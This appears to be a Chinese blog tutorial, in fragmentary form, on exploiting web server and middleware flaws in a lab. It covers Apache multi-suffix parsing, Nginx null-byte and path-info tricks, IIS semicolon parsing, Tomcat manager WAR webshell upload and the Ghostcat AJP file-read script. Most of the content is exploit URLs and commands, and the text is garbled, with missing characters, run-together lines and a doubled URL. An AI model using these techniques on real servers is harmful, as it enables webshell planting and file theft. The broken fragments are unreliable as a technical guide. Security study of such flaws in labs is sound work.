WEB端常见组件漏洞利用浅析
导读:测试环境操作系统 Windows、LinuxWeb 容器 Apache、Tomcat、Nginx、IIS中间件 php、java、python、perl数据库 MySQL、Oracle、SQL Server、Access、Redis其他组件 phpStudy、Weblo...
操作系统 Windows、LinuxWeb 容器 Apache、Tomcat、Nginx、IIS中间件 php、java、python、perl数据库 MySQL、Oracle、SQL Server、Access、Redis其他组件 phpStudy、Weblogic、JBoss开发框架 s2、thinkphp、vue
1. 组件与漏洞名称2. 影响版本3. 漏洞的检测4. 漏洞的复现5. 漏洞的利?(漏洞场景、?具)6. 修复?案
http://192.168.10.128/upload/yjh.php.wenxin
yjh.php.wenxin Apache 会当做PHP ?件来解析。
Apache 从右侧向左解析后缀名。Apache/2.2.25 (Win32) mod_ssl/2.2.25 OpenSSL/0.9.8y PHP/5.2.17
nginx 0.5.*nginx 0.6.*nginx 0.7 <= 0.7.65nginx 0.8 <= 0.8.37
nginx version: nginx/0.7.65http://192.168.10.128/info.pnghttp://http://192.168.10.128/info.png%00.php
docker-compose up -d
http://192.168.10.130/uploadfiles/6996efdd38b0767328bdfc1bbe7b932f.png/.php
nginx/1.17.4
Nginx 0.8.41 ~ 1.4.3Nginx 1.5.0 ~ 1.5.7
# 上传图???[1_yjh.jpg ] // .jpg后面有一个空格 http://192.168.16.100:8080/uploadfiles/1_yjh.png http://192.168.16.100:8080/uploadfiles/1_yjh.png[0x20][0x00].php
// time.asp <%=time()%>
time.asptime.asp;.jpg http://10.10.10.233:8000/time.asp;.jpg
time.jpg /1.asp/time.jpg //time.asp--->time.jpghttp://10.10.10.233:8000/1.asp/time.jpg
Windows 2008IIS+PHP
http://192.168.16.193:8000/index.pnghttp://192.168.16.193:8000/index.png/.php
PHP-CGI1. cgi.fix_pathinfo = 02. 处理映射程序|编辑模块映射|请求限制|映射|对勾
C:\Program Files\Java\jdk1.8.0_131JAVA_HOME:C:\Program Files\Java\jdk1.8.0_131Path:%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;
C:\apache-tomcat-8.5.32\bin>startup.bat
sudo nmap -A -p- 192.168.10.130
/webapps/manager/META-INF/context.xml
/conf/tomcat-users.xml
jar cvf jshell.war jshell.jsphttp://192.168.16.193:8080/jshell/jshell.jsp
tomcat 6tomcat 7 < 7.0.100tomcat 8 < 8.5.51tomcat 9 < 9.0.31
./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.16.193 -p 8009 -f WEBINF/web.xml
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
Hackyh'Blog版权声明:以上内容作者已申请原创保护,未经允许不得转载,侵权必究!授权事宜、对本内容有异议或投诉,敬请联系网站管理员,我们将尽快回复您,谢谢合作!

